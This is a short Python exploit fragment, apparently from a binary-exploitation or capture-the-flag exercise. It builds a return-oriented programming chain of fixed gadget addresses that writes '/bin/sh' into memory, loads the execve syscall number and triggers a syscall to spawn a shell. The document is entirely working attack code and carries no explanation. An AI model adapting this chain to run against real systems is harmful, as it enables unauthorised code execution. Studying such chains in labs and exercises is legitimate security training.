payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4a4fa0)+p64(0x4312a7)
# 0x00000000004312a7: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40459c)
# 0x000000000040459c: mov qword ptr [rdi + 0xd0], rax; mov eax, 1; ret; 
payload += p64(0x4312a7)
# 0x00000000004312a7: pop rax; ret; 
payload += p64(0x4a51c0)+p64(0x48ddcc)
# 0x000000000048ddcc: pop rdx; add byte ptr [rax], al; nop; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4a5070)+p64(0x40a4c9)
# 0x000000000040a4c9: pop rsi; ret; 
payload += p64(0x0)+p64(0x4312a7)
# 0x00000000004312a7: pop rax; ret; 
payload += p64(0x3b)+p64(0x46fbec)
# 0x000000000046fbec: syscall; 
payload += b''
